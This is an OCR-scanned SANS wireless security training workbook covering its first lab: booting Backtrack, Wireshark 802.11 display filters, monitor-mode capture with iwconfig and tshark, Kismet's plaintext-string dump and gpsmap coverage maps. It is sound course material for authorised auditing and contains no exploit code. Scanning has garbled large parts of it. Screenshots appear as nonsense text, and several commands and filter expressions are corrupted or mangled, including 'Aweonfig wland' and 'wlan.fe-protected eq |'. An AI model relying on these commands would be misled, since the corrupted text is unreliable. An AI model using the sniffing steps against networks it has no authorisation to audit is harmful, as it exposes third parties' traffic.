www.sans.org SECURITY 617 ASSESSING AND SECURING Wirevess Networks WorkbookCopyright © 2007, The SANS Institute. All rights reserved. The entire contents of this publication are the property of the SANS Institute. User may not copy, reproduce, distribute, display, modify or create derivative works based upon all or any portion of this publication in any medium whether printed, electronic or otherwise, without the express written consent of the SANS Institute. Without limiting the foregoing, user may not reproduce, distribute, re-publish, display, modify, or create derivative works based upon ail or any portion of this publication for purposes of teaching any computer or elecironic security courses to any third party without the express written consent of the SANS Institute. 011307Lab 1 — Sniffing Wireless Complete the exercises in this lab to reinforce the material covered in the Sniffing Wireless module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included in the SWAT toolkit.Introducing the Backtrack Security Collection Linux Distribution Purpose: The purpose of this exercise is to introduce the Backtrack Security Collection bootable Linux distribution, This Linux distribution will be used throughout the course for lab exercises. Description: In this exercise you will configure-and boot your laptop from the Backtrack Security Collection CD that is included with your SWAT toolkit, You will lear the basics of navigating the X-Windows interface supplied with the Backtrack CD, and how to prepare your system to complete the lab exercises for this course. IMPORTANT: It is important to note that hacker tools are not written with the same quality and reliability of commercially-available tools. Many hacker tools work unreliably, and may cause unexpected results against the target system, as well as the local system running the tools. We have taken steps to ensure the tools used in this lab will not damage your system, and will work as advertised against a target router. However, it is our recommendation that you use a non-critical system that does not hold valuaile data that would be disadvantageous to you or your organization if it were lost or otherwise disclosed. 1.1.1. Boot Linux Boot your laptop using the Backtrack Security Collection Linux distribution (Backtrack) by placing the CD-ROM in your CD-ROM drive and turning your laptop on. Depending on the configuration of your laptop, you may have to instruct the laptop to boot the CD- ROM in favor of the local hard drive during the BIOS startup sequence. After Backtrack completes the boot sequence (which may take several minutes depending on the speed of your CD-ROM and processor and size of local memory), you will be presented with a login prompt. Authenticate using the following username and password: Username: root Password: toor. After authenticating, you will be presented with a standard shell print that will appear similar to the example below:BT login: root Passowrd: *#** Br At the shell prompt, enter the command "startx" and press enter. This will start the X- Windows interface for Backtrack. After the X-Windows interface starts, you will be presented with the main GUI window, as shown below re back|track Bes sa TE sae > may Bee KDE Window Manager for Backtrack Security Collection. Note the *K" bullon in the bottom-Ieft corner. 4.1.2. Exploring Backtrack Tools ‘The "K” button in the lower-left comer of the taskbar is analogous to a Windows "Start" menu button. Take a few minutes and become familiar with the layout and configuration of these menus. Be sure to identify the locations for the following tools: ea]© Kismet © Firefox (web browser) We will continue to use the Backtrack environment throughout the course. If you experience a problem completing this portion of the lab exercises, please seek the assistance ofa proctor or the instructor.Lab 1-2: Using Wireshark Display Filters Purpose: This lab will introduce the student to the syntax and language to manipulate packet captures with the Wireshark display language. Description: In this lab, you will use a supplied packet capture file to manipulate the packets that are displayed based on the characteristics of the file. In the process, you will use various features of the Wireshark display filter language functionality. 1.2.1, Start Wireshark Start the Wireshark sniffer by clicking "K -> Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button, as shown below. Command: fwireshi L Options>> | [Spun] |X _Conce KDE run command dialog ‘This will start the Wireshark Network Analyzer. After Wireshark starts, maximize the ‘window to fill your screen. Next, open the file "wireshark-sample.dump" in the labl folder by clicking File > Open. In the dialog box that is presented, navigate to the ‘/imp/labl folder (double-click the "Filesystem" label, then double-click the "tmp" directory, then double-click the "lab!" directory). Next, select the "wireshark- sample.dump" capture file. Click OK to open the file8] volar Nome + [oainea] ivaces Tiasi0e [i apsmapiascsr niasios [Donsmapian aun auasios ID arsmapins aps ninsios [Di opsmapiannanwen niasi08 ID sosmoptao ame uungios ‘VDmap_s1.772099, 71 306510.2757 600,600.96 Linsi06 ean | tne Soe |-—_ n= ieiranarcairle-dome oe torres \eeshettepeumpl. pap Enable UAC name cotton ‘ste os0s3 nytes octets sos Enabie peteicrame esotion eRe rstracket ‘ans.080374723 Enablorancportnamerstoliter —ciesregumme una wees | Eom Wireshark file selection dialog box. 4.2.2. Inspect the packet dissector display ‘The packet dissector display interprets the contents of the fields of a packet in a tree-like hierarchical view. ‘The first tree view is always the "Frame" information that includes the timestamp of the packet including the actual arrival time, the delta time since the previous packet and the time since the first packet. The packet number in reference to the number of packets in the current capture is identified, along with the packet length and the capture length information. lll of these fields can be used as filter criteria in display filters. In the first frame of the capture file, expand the "IEEE 802.11" tree. Note that Wireshark collapses other fields in the "IEEE 802.11" tree as well, such as the "Frame Control" field contents, Expanding the “Frame Control" tree may include other sub-trees as well. 1.2.3. Inspect the packet contents display The packet contents display is the bottom-most pane that displays the hexadecimal and ASCII representation of the packet contents. Click on any of the bytes in the hexadecimal display or the ASCII display to reveal the corresponding field interpretation in the packet dissector display. Note that the inverse is also true, selecting a field in the 1-6packet dissector view will highlight the hexadecimal and ASCII bytes of the packet contents display. 1.2.4. Inspect the status bar field display The status bar is the bar at the bottom-most edge of the Wireshark window. Let's take a look at the information that is displayed in these fields. Click on the destination address field in the packet dissector view. Note that the display filter is updated to identify the friendly name of the field ("Destination Hardware Address" and the display filter name for the field ("wlan.da") and the length of the field (Gbytes). The name of the display filter field is important for creating display filters based on the contents of specified fields, as we will see later in this module. Next to the field information is a second textbox with "P:", "D:* and "M:" listed with various values following them. The P field indicates the total number of packets in the capture. The D field indicates the total number of packets that are displayed as a result of a display filter, and the M field indicates the number of marked packets. 1.2.5. Filter all packets with the privacy bit set In the display filter box, supply a filter that will display only packets with the privacy bit set, We can determine the display filter name for the privacy bit by clicking on this field and observing the display name in the status bar, as shown below.Ble Gat View Go Coptwe Analyze Stestcs Hep Linesysa sti Date nara, sa0e3, FO fone 6082:62 (Rsk feenoedaeene Fane > Go byes on wre, Ba bytes ctured) > eee 902.30 i Type/suoeipe: Osea 132) ‘= Frane content: O18 (rest) Version 0 | Tipe: Data tran (2) I Sintype: 0 | 1 Flags: ox Ds ston: Frans oor STH Eo 05 08m 2 10 0S: 3 Fran OS: ©) O01 | 1 Prokeses fag: ata is protected { Oroer Fag: tak strict (ante qromectel Identifying the display filter name of the WEP bit field Since we want instances where the WEP bit is set, use the WEP filter "wlan.fe-protected eq |". Click “Appiy" to make this filter effective. The applied filter is shown below.De Eat Yew Go Coplure Anabre Slalsucs eb BeRAe i> B«eS Beso Fs ae aa op sear STAR 5 ere : nee eo. Type/Subeape: aca (32) = Prove Control: 04008 ent) Version: © "per data rane (2) i sites i es; rane frum ST fo 99 via aa AP (To B62 Fron OS: 6) <0) re Froese; This 15 the ty: Fre ts not belag Tetra ys Hr STA WLU stay Wp = Protectes flag: Uata is rotected Order flog: lnt striethy erased 2 eaoenew eT mn # ad 2 We 75 ™ OD 95 wt De Se 4 3S ces 2 Gt ob fe 16 OF h Tie Tis ra eet Applying a filter (o exclude all frames without the WEP bit sel. Question: How many packets are displayed afier applying the WEP bit set filter? 1.2.6. Inverse WEP filter There are multiple ways to reverse a filter to display the inverse match. Each of these display filters has the same effect: wlan. £c.protected iwlan.fc.protected wlan. fe.protected != While each filter is subtly different, on a bitwise field with only two possible values (1 or ), they will always produce the same result. Apply one of the inverse WEP filters as, shown above and apply the settings. Question: How many packets are displayed after applying the inverse WEP filter?4.2.7. Excluding beacon frames Its often desirable to remove beacon frames from a packet capture, since they represent nearly duplicate information that can otherwise clutter a display of more interesting packets, Identify the display field name of the frame control field by selecting the type/subtype field in the packet dissector pane. Note the value that is represented by Wireshark for this field, as shown below. x@GigesoFe BG aq =] eoreesen-[ Sen] v tory] Broadcast ‘Beacon, f Beacon frame, $t2030, Fc Unieyeg.3t:a1¢% Uae Gate tst089 Rho. Frans (U8 bytes ou wire, 128 bytes captured) > ie 302.0 “pete: Bescon rane (6 ‘> Fane Conerot: O80 Version: 8 Tipe: Nonagenent frome (O) Sibtype: 8 Flags: 30 estlaation adress: Orooecont (Ff fsefoFF Fv ef) | sovrce aairenes Aironet 47:8ie8 (C0M0:95:47-6:08) | td aaroet_a7-a6ice (00A0:96:47:96:ce) Fragrent nuber™ 9 Seqence noe 2030 TREE 0.31 wireless LAN manage rane cote cc 91 s107 Ge or 1 33 er ener Identifying the display filter name of the frame control type/sublype field. Apply an inverse filter to eliminate beacon frames from the capture file. (Hint: Clear the previous filter to display all the packets again) (Hint; Test for the display field being equal to "8") (Hint: The display field name is "wlan.fc.type_subtype") (Hint: Use the negation operator "!" to apply the inverse filter) Question: How many packets are displayed after removing all the beacon frames from the capture file? 1-101.2.8. Specifying the BSSID When evaluating the security for a specific network, it is helpful to reduce the number of packets displayed to only a specific BSSID or collection of BSSID's. This allows us to climinate traffic from ad-hoc networks or access points that are not part of the audit. Apply a filter to display only traffie with the BSSLD "00:40:96:47:86:ce" (Hint: Clear the previous filter to display all the packets again) (Hint: Click on the BSSID field of any packet) (Hint: Look the status bar to determine the display field name) (Hint: Use the equal-to operator in the display filter) (Hint: Make sure the BSSID is specified in colon-separated format) Question: How many packets are displayed for the given BSSID? 1.2.9. Joining filter criteria So far we've made use of singular display filter expressions. Multiple filters can be joined together using the "and" and "or" keywords. Write a display filter to display only traffic from the BSSID "00:40:96:47:86:ce" that are not beacon frames. (Hint: Use the previous exercise to retain the BSSID filter) (Hint: Append the filter language to exclude beacon frames) (Hint: Separate the filter criteria with the "and" keyword) Question: How many packets are displayed for the given BSSID that are not beacon frames? 1.210. Implementing an inverse filter Inverse filters allow you to exclude packets that you are not interested in, revealing other useful information. Inverse filters are usually applied by joining multiple filters together. Write a display filter to exclude beacon frames and data frames from the capture list. (Hint: Clear the previous filter to display all the packets again) (Hint: Use the frame type/subtype field to identify packet types) (Hint: Click on the type/subtype field to identify the display name for this field) (Hint: Click on the sample frames you want to exclude to identify their type/subtype value) (Hint: The display field name is "wlan.fe.type_subtype") (Hint: The type for beacon frames is "8") 1-11(Hint: The type for data frames is "32") (Hint: Combine multiple filters using the "and" keyword) (Hint: Test field using the "not equal to" operator) Question; How many packets are displayed for by excluding data and beacon frames? The display filter for this question could have several correct answers. Assuming you specified the beacon frame type first and the data frame type second, here are some correct answers that are all equally effective: "yvlan.fe.type_subtype != 8 and wlan.fc.type_subtype != 32" “wvlan.feclype_subtype ne 8 and wlan.fe.type_subtype ne 32" 'wlan.fe.type_subtype == 8 and !wlan.fe.type_subtype == 32" “not wlan.fe.type_subtype 8 and not wlan.fe.type_subtype 32)" 3" "\(wlan.fe.type_subtype == 8 and wlan.fe.type_subtype Note the last example ~ by enclosing the display filter with parenthesis, we can apply a single negation operator to the entire expression to reverse its effect. 1.2.11. Searching for a text string The “contains” keyword allows newer versions of Wireshark to search the contents of display fields for a given string. This comparison operator can be applied to any display field name, and successfully matches when the matching string is a substring of the display field contents. Use the “contains” keyword to search the capture file for keyword "linksys". Use the Gisplay field name "frame" to search the entire contents of the packet (Hint: Use the syntax "frame contains ..." (Hint: Specify the search criteria in double-quotes) Question: How many packets are displayed with the string "linksys"? Close Wireshark at the end of this exer by clicking File > Quit.Lab 1 Capturing Wireless Traffic in Monitor Mode Purpose: This lab will introduce the process of configuring the wireless interface card in monitor mode. Description: In this lab, you will use the wireless card supplied in your SWAT toolkit and capture raw 802.11 packets. This is a critical step in the ability to audit wireless networks, since much of our analysis will depend on the ability to capture 802.11 frames from the target network, 1.3.1. Insert your wireless card For this exercise, we will use the Prism 2.5 wireless card that is supplied with your SWAT toolkit to capture traffic. First, attach the omni-directional snap-on antennas to the wireless card. This provides a mechanism for the radio card to receive traffic on the wireless network. Next, insert the wireless card into your laptop's PCMCIA slot. Depending on your laptop, you should hear two high-pitched beeps. A low-pitch beep indicates a problem with the card insertion event. Using an XTerm window, use the “ifconfig - system, as shown below. command to list all the interfaces on your # ifconfig -a echo Link encap:Ethernet HWaddr 00:06:1B:C2:DE:EA BROADCAST MULTICAST MTU:1500 Netric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 ‘9X packets:0 errors:0 dropped:0 overruns:0 carrie collisions:0 txqueuelen:1000 BX bytes:0 (0.0 b}) TX bytes:0 (0.0 b) Interrupt:11 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Matric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 ‘TX packets:0 errors:0 droppad:0 overruns:0 carrier:0 collisions:0 txquevelen:0 RX bs (0.0 b) TX bytes:0 (0.0 b) wifi Link encap:UNSPEC HWaddr 00-02-6F-35-73-0F-00-00-00-00-00- 00-00-00-00-00 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:3 Base address:0x100 1513Wiand Link encap:Ethernet AWaddr 00:02:6P:35:73:0F UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 ‘TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b} Interrupt :3 Base address: 0x100 Check the output for the presence of the "wlan0" interlace, indicating the wireless card is recognized by your system. If'you do not recognize the "wlan0" interface, seek the assistance of a proctor or the instructor. 1.3.2. Configuring Monitor Mode The iwconfig" command is used to observe and change the configuration of the wireless card on Linux systems. Use the "iwconfig wlan0" command to examine the settings present on the wlan0 interface, as shown below: # Aweonfig wland wland TEBE 602.11b BSSTD: "test" Vode:Managed Access Point: 44:44:44:44:44:44 Bit Rate:2Mb/s Sensitivity=1/3 Retry min limi Encryption key:off Power Management: off Link Quality:0/70 Signal level:-73 dBm Noise level:-73 dam Re invalid nwid:0 Rx invalid crypt:255 Rx invalid freg:0 Tx excessive retries:0 Invalid misc:484 Missed beacon:0 RIS thr:off Fragment thr:off Note the default settings for the wlan0 interface are to use the ESSID "test" in mode "Managed". Also note that the default frequency is "2.457 GHz", or channel 10. We'll change this setting to configure the card in monitor mode with the "iwconfig wlan0 mode monitor" command, as shown below: # Awconfig wlan0 mode monitor # iwconfig wland wland IEEE 802.11b BSSID:"tast" Mode:Monitor Frequency:2.422GHz Access Point: 10 :00:00:00:00 Bit Rate:2Mb/s Sensitivity=1/3 Retry min limit:8 RTS thr:off Fragment thr:off Encryption key:off Power Management :off Link Quality:0/70 Signal ievel:~73 dam Noise level:-73 dam 9 “14Rx invalid nwid:0 Rx invalid erypt:255 Rx invalid frag:0 T excessive retries:0 Invalid misc:484 Missed beacon:0 ‘Next, ensure the interface is in the "up" state with the ifeonfig command, as shown belo # ifconfig wland wland Link encap:UNSPEC HWaddr 00-02~6F-35-73-0F-10-F8~00-00-00~ 00~00-00-00-00 BROADCAST RUNNING MULTICAST MTU:1500 Metric: -RX packets:861 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:82647 (80.7 KiB) TX byte: Interrupt:3 Base address: 0x100 (0.0 b) # ifconfig wlan up + Lfcontig wiano wland Link encapiUNSPEC Hifaddr 00-02~6F-35-73-0F-10-P8-00-00-00- 09~00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metrii RX packets:1110 errors:0 dropped:0 overruns:0 frame:0 TK packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:106635 (104.1 KiB) 1X bytes:0 (0.0 b) Interrupt :3 Base address :0x100 Note that the MAC address specified for the wlan0 interface has several trailing values after the actual physical interface. This is another identifier that we can use to confirm the wireless card has been placed in monitor mode. Next, open a second XTerm window to start displaying packets captured with the text- based Wireshark tool tshark. Execute the command syntax shown belo} + tehark -ni wland Depending on the wireless networks in the area, you may or may not get any immediate response from the tshark program on the default channel configuration. Returning to the other XTerm window, use the iwconfig command to change the channel as shown below: 4 iwconfig wlanO channel 1 1-15‘iwconfig wiand channel iwconfig wlan0 channel iwconfig wlan0 channel iwconfig wlan0 channel iwconfig wlan0 channel iweonfig wlan0 channel iwconfig wlanO channel iwconfig wlan0 channel iwconfig wlanO channel iwconfig wlan0 channel inconfig wlanO channel 1 Depending on the networks in your area, you will start to see wireless traffic information from the output of tshark, as shown below Term chunging channel numbers with iweonfig ‘mode with tshark, Note that channel hopping is the only way to capture traffic on all wireless networks within range of a single wireless card, and that some traffic is lost in the process waile hopping on other channels. After identifying traffic in monitor-mode with tshark, press CTRLIC to stop the capture. 1-16Introduction to Kismet ‘This lab will introduce Kismet and the navigation of the Kismet text-based interface. Description: In this lab exercise we will introduce Kismet as a tool for assessing wireless networks, We'll take a look at how we can run Kismet on the Backtrack Security Tools Linux distribution, navigating the text-based interface to leverage the features of this powerful tool. 1.4.1. Starting Kismet When capturing GPS information with Kismet, Kismet relies on a helper application known as "apsd" to read information from the GPS receiver and translate it into a format Kismet can understand. Follow these steps to prepare the GPS and helper application before starting Kismet. First, connect the SWAT kit USB GPS to your laptop on an available USB port. The red LED should start blinking when connected to a USB port; and will stay solid when the GPS locks onto 3 or more satellites. Since you are likely indoors when you follow this lab, the GPS will be unable to gain a satellite lock. That's OK for the rest of this lab, although you will want to use the GPS outside if you want to collect accurate GPS information from the device. ‘Next, start the GPS daemon by clicking *K > Run". In the run dialog box, enter the path command "gpsd /devitts/USBO" to specify the SWAT GPS (use the proper case in this example for the path of the device), as shown below. Click "Run" after specifying the gpsd command Pleas erie the pod, vire you GPS deve Is lack i (aermnsed ook X cancel Supply the path to the SWAT Kit GPS device as shown in this dialog box. ‘Now that the GPS helper software is started, we can start the Kismet software. Navigate the KDE menu by clicking "K > Backtrack > Wireless Tools > Analyzer > Kismet" Backtrack automatically select the first appropriate wireless card and start Kismet, saving, the files in the root user's home directory ("/root") 1-17At this point, Kismet will automatically channel hop and identify any networks that are discovered. Depending on the networks that are nearby, the information presented by Kismet will differ, but will look similar to the example below. If Kismet does not start, make sure the wlan0 interface was placed in the "up" state with the command “ifconfig wlan0 up". Kismet opening sereen, recognizing three networks 1.4.2, Getting context-sensitive help ‘The Kismet text-based interface may seem difficult to navigate at first, but itis very straightforward once you lear a few tricks. Even though GUI interfaces exist to work with the kismet_server architecture, the text-based interface offers the most functionality and can be used to quickly navigate between different windows and features with only a few keystrokes, e help. The abbreviations used on each Kismet screen are explained using context-sensi In any Kismet window, pressing "h” will introduce a help screen that explains the available options and the abbreviations used on the current screen. Press "h" in the main Kismet window to introduce the help menu, as shown below. Kismet contex!-sensitive help menu, 1-18Using the up and down arrow keys, navigate the help menu to identify the available options at the main Kismet window. Question: What does the abbreviation "T" represent in this screen? Question: What do the abbreviations "A", "P” and "H" represent in this column? Question: What keystroke is used to exit the help menu? 1.4.3. Changing network sort-order The default sort order for discovered wireless networks is known as "Autofit mode" Changing the sort order allows the user to navigate between different networks using the up and down arrow keys Press "s" to select the sort order menu. Note that the order for each sort mechanism can be reversed by using the capitalization of the sort order keystroke. For example, sorting networks by first seen with "f" can be reversed in descending mode with "F". Kismet sort option menu. Sort the networks by choosing the-first time seen option 1.4.4, Selecting networks Once the sort order is changed from autofit mode, highlight different networks. Pressing "Enter" or " the "Network Details" screen, as shown below: se the up and down arrow keys to " on the selected network will open 1-19Kismel network details sereen. Select a network that Kismet has identified and view the network details window. Use the up and down arrows to scroll the information that is presented on the screen. Question: Does Kismet indicate the network uses WEP for the selected network? Question: What channel is the selected network using? ‘Question: Is Kismet able to identify the manufacturer for the selected network? What manufacturer does Kismet identify? 1.4.5. Using the traffic analyzer A useful feature to get some basic information about the contents of network traffic is the Kismet traffic analyzer in the "dump packet types" menu option. This window briefly summarizes the different packet types observed on the network, and offers some limited upper-layer protocol decode functionality. From the main Kismet window, use the help functionality to identify the option to open the "dump packet types” menu option. Select this option to open "Packet Types" window, as shown below. Kismet packet decoding window. 1-20Observe the traffic identified in this window. Note that the MAC address of the transmitting station is identified, along with the packet type (MANAGEMENT, DATA) and a brief description of the packet. This view allows the Backtrack to identify partial traffic contents, although further analysis is best performed with Wireshark or another detailed protocol analysis tool. 4.4.6. Observing plaintext strings A very useful feature of Kismet is to dump the contents of observed plaintext strings it the "Data String Dump" window. Whenever Kismet sees plaintext ASCII content in the payload of data packets on the network, it will display the ASCII content in this window. From the main Kismet window, use the help functionality to identify the option to open the "Dump printable strings" menu option. Select this option to open "Data Strings Dump" window, as shown below. Kismet "dump printable strings" feature, This example demonstrates the "CKAAAAAAAAAAAAAAAAAAA* string, which is characteristic of older Windows operating systems vulnerable to NULL session attacks. Question: What information are you able to obtain about the networks observed in your area from this window? If there is no unencrypted wireless activity in your area, there will not be any plaintext strings presented. Watch this Kismet window for a few minutes to identify any plaintext strings, then continue with the next step. 1.4.7. Locking the channel ‘When auditing a specific network, you will likely want to focus on a specific access point ‘ona given channel instead of channel-hopping. Locking Kismet to a specified channel reduces the chances of missing interesting traffic, since it is not spending time on other channels.Kismet recently introduced functionality to dynamically stop and start the channel hopping functionality. We can lock the channel by selecting a given network and pressing the "L" (Lock) key. The Kismet status bar will be updated as shown below oe cin) ng st 7 ee ‘Status bar indigating channel number for the “hostap" source ig locked on channel 1 Note that after locking the channel, the exclamation mark to the left of the network name is consistent for each network on the selected channel. The exclamation mark indicates Kismet is currently seeing traffic for this network; the period indicates Kismet has recently seen traffic for this network. No indicator indicates that Kismet has not recently seen traffic for the network. We can revert to the channel hopping process by pressing " status bar will be updated as shown below. " (Hopper) key. The Kismet ‘talus bar indicating the "hostap" source hs reverted to channel hopping. 1.4.8. Quit Kismet Quit the Kismet too! by pressing "Q" (capital Q). Backtrack will automatically close the XTerm window for Kismet as well. 1.4.9. Identify Kismet Files Kismet generates several files by default that can be used for post-processing analysis with Wireshark, gpsmap and spreadsheet or database tools. When we started Kismet, we instructed Backtrack to save the files in the "/tmp/lab|" folder; let's take a look at the files that were created. Return to an XTerm window (or open a new XTerm, if desired), Change to the "/root" folder and list all the files that include the word "Kismet", as shown below. 1-224 cd /root root@1[labl]# 1s Kismet* Kismet-Dec-23-2006-1.csy Kismet-Dec-23-2006-1 network Kismet-Dec-23-2006-1.dump Kismet-Dec-23-2006-1. xml Kismet-bec-23-2006-1.gps root@1[1abl]¥ Kismet generates several files to log the activity on the wireless network that it recorded, The following table identifies the content of the files based on extension:-dump ‘Libpeap capture file of all wireless traffic observed by Kismet network ‘Text-file summary of networks and clients observed by Kismet, suitable to be imported into a Word processor or viewed with a text-editor, xml ‘XML-formatied information collected by Kismet. Suitable to be imported into a spreadsheet tool such as Excel. sv Semi-colon separated data file of Kismet data, also suitable to be imported into a spreadsheet tool or a database, Does not provide ‘as much information as the XML file. “es GPS coordinates for traffic collected by Kismet. This file is used by the gpsmap too! to generate images of observed networks. “cisco Text-file of Cisco Discovery Protocol (CDP) data observed by Kismet. Suitable to be imported into a Word processor or viewed with a text-editor. ‘weak Libpeap capture of WEP-encrypted packets that include eryptographically weak frames, suitable for use with Airsnort Note that Kismet will delete files that contain no data when exiting. For instance, if no Cisco Discovery Protocol traffic is observed, Kismet will not produce a ".cisco" file. ‘no cryptographically weak WEP packets are observed, Kismet will not produce a ".weak" file. After assessing a network with Kismet, you can use the output files with other tools such as spreadsheet, word processing and sniffer tools to further massage and analyze data. With the ".gps” and "xml" file, you will be able to generate maps that document the range and coverage of signal with the gpsmap tool. Examine the contents of the Kismet "network" file with the kedit tool as shown below. Since the name of the ".network" file includes the date stamp, it will likely not match the example below. Please substitute the correct filename for your environment. # kedit Kismet-Dec-23-2006-1.network Kedit will open and display the contents of the ".network" file, presenting summary information about the networks detected by Kismet, similar to the example shown below. 1-24Examine the contents of this file - identify information that would be useful to include in a summary report about the characteristics of identified wireless networks. Close kedit by clicking "File > Quit" when finished, [auit [Seve] ad Rid tr Klanct Tr -0i- BOUL netrk ie Gudieer-Kianet-Rpr-01-2006-1. network opened read = uri betuork 2: “WETOENR™ osstD: P infrostrusture + tnenoun Sat fe 1 Te Hin Lac: Let 99,000000 tan 100, 000000 Ait 0.000000 Spd 4.020000, Han Coot Let -8),000000 Lan ~1i0.000000 RAE” 0.000000" Spd 0000000 fs os Kedlt display of the Kismet ".network" file Welll continue look at additional methods of leveraging the Kismet output files for post- processing analysis later in this course. This lab exercise just scratches the surface of the power of Kismet. The best way to gain experience with this powerful tool is to experiment with its features and functionality in different environments. We'll continue to review different Kismet features throughout this course, introduce a homework exercise that will require students to seek specified access points hidden throughout the conference facility. 1-25Lab 1-5: Introduction to GPSMAP_ Purpose: This lab will introduce the student to the use of the gpsmap too! for mapping + network coverage from GPS and packet capture data. Description: In this lab we will use the gpsmap too! to map the networks that were observed by Kismet in a session that is stored on your lab CD-ROM. The steps we use in this lab to produce wireless network coverage diagrams can be repeated with later packet captures for different networks 1.5.1, Examine gpsmap options GPSmap is a very powerful tool for documenting the range of wireless networks. There are many options available to generate flexible maps of a variety of formats from a variety of sources. What comes with powerful command-line tools such as gpsmap is a complex user- interface. ‘There are so many options to gpsmap, it is often difficult to keep them straight. Fortunately, the manual page and the help that comes with epsmap clearly defines the many options available in gpsmap. First, change the current directory to the labl directory in the /tmp folder created earlier in this exercise, as shown below. # cd /tmp/lebL Run the gpsmap program with the "--help" option, redirecting the output to a file. Next, open the file with the gpsmap options to keep as a quick-reference source throughout this lab. Open the file using the "kedit" text editing tool, as shown below. # gpsmap --help >gpsmap-help. txt } kedit gpsmap-help.txt & (1) 7065) ’ The kedit tool will display in front of your XTerm window, as shown below.(Suit [Save [Coad onap-feipwee | es ContralcB and tenteni-B to: Search Fe erste opened ead — wit. 5 ‘snanep-helh tnt Wea Relea = JEsaue! gpome TUPTIONY nat do you thing you're reading? 28) Seutpat nage uatput fle oR Shiiter ern’ Lise) Coma-separated 1ist of Hie ta Fier SE, Tinweet tite Invert fLitering (OMY draw CéLtered Mice) SE, + sid.png -u -t -1 bssid Open the "hull-bssid.png" file to view the changes to the map. The updated map should look similar to the following. Note that the BSSID labeling reveals networks that were not previously characterized by gpsmap with the hull shapes. Kismet requires at least two discrete data points for hull mapping to identify the coverage range. 1.5.5. Create an estimated range map Estimated range maps are useful to characterize the estimated coverage of network without requiring a large set of data samples. The estimated range map takes some 30liberties to estimate the actual useful range of the network based on lost packet characteristies and signal strength information, and can paint a very different picture than the hull map. ‘We'll create an estimated map with the following options; new options are identified in bold. Command Argument (if Description option any) D Do not delete the source map at completion Ss 2 Use the TerraServer source for maps -d 800,600 Generate maps at 800x600 resolution 0 range-bssid.png Create the output map as “range-bssid.png" 4 Use the "range map" diagram format R 50 Change the opacity of range circles to 50% “4 7 Draw the track traveled in the diagram format rT bssid Label the networks with BSSID information epsmaplab.gps Kismet GPS file to process Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below. # gpsmap -D -S 2 -d 800,600 -o range-bssid.png ~t -r -R 50 -1 bssid gpsmaplab.gps ? Open the "hull-bssid.png"” file with the display utility to view the changes to the map. ‘The updated map should look similar to the following, 1-314.5.6. Include center-dot estimate mapping GPSmap will attempt to estimate the center point of each network based on signal strength levels and averaging from collected data points. We'll create the range map again with the following options; new options are identified in bold. Command Argument (if any) ~~ Description option D Do not delete the source map at completion s 2 Use the TerraServer source for maps “4 800.600 Generate maps at 800x600 resolution “0 range-bssid-cdot.png Create the output map as “hull-bssid-cdot.png” + Use the “range map" diagram format R 30 Change the opacity of range circles to 50% +t Draw the track traveled in the diagram format -) bssid Label the networks with BSSID information “ Draw estimated network center dots gpsmaplab. gps Kismet GPS file to process Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below, 1-32# gpsmap -D -S 2 -d 800,600 -o range-bssid-cdot.png -t -r -R 50 -1 bssid -e gpsmaplab.gps ' Open the "hull-bssid-cdot.png" file with the display utility to view the changes to the map. The updated map should look similar to the following. mapping. 4.5.7. Change color selection GPSmap supports several color selection options for.discovered networks. The default ‘option is to use random colors for the mapping of networks. We can change this setting to color networks based on WEP-bit status, or on channel number. We'll create the range map again with the following options; new options are identified in bold, Command Argument (if any) option D 8 2 d 800,600 -o range-bssid-chan.png Description Do not delete the source map at completion Use the TerraServer source for maps Generate maps at 800x600 resolution Create the output map as “hull-bssid-chan. png 1-33Use the "range map" diagram format 50 Change the opacity of range circles to 50% +t Draw the track traveled in the diagram format 5 bssid Label the networks with BSSID information mn 2 Select colors based on channel number gpsmaplab.gps Kismet GPS file to process Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple fines in the example below. # gpsmap -D -S 2 -d 800,600 -o range-bssid-chan.png -t -r -R 50 -1 bssid -n 2 gpsmaplab.gps xomitted for brevity> ' Open the “hull-bssid-chan.png” file with the display utility to view the changes to the map. The updated map should look similar to the following. Estimated range map with traveled track, BSSID labeling and color selection based on channel number. Repeat this step, changing the color selection to reflect the WEP bit status ("-n 2" becomes "-n 1"). Name the output map "range-bssid-wep-png". 1-341.5.8, Filter for a specified network ‘An important feature for gpsmap is the ability to produce maps based on a specified list of MAC addresses. This allows the Backtrack to document the networks for a specific organization without mapping the nearby networks that are not connected to the target network, ‘To use this feature, supply a comma-delimited list to gpsmap of BSSID's to map. By efault, epsmap expects the list to be an exclusive list (e.g. "Don't map these BSSID's"), 0 we need to reverse this logic by instructing gpsmap to use the filter list as an inclusive list. For this step, welll introduce a new map type known as a scatter-plot map; new options are identified in bold. Command Argument (if any) Description option -D Do not delete the source map at completion 8 2 Use the TerraServer source for maps “d 800,600 Generate maps at 800x600 resolution “0 seat-filt-bssid.png Create the output map as "scat-filt-bssid.png" “a Draw a scatter-plot map “A 50 Change the opacity of the seatter-plot map to 50% 4 00:40:96:47:86:CE Filter on the selected MAC address, must m use upper-case characters for MAC ai Inverse the filter to make the filter list inclusive “t Draw the track traveled in the diagram format oT bssid Label the networks with BSSID information gpsmaplab.gps Kismet GPS file to process Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below, # gpsmap -D -S 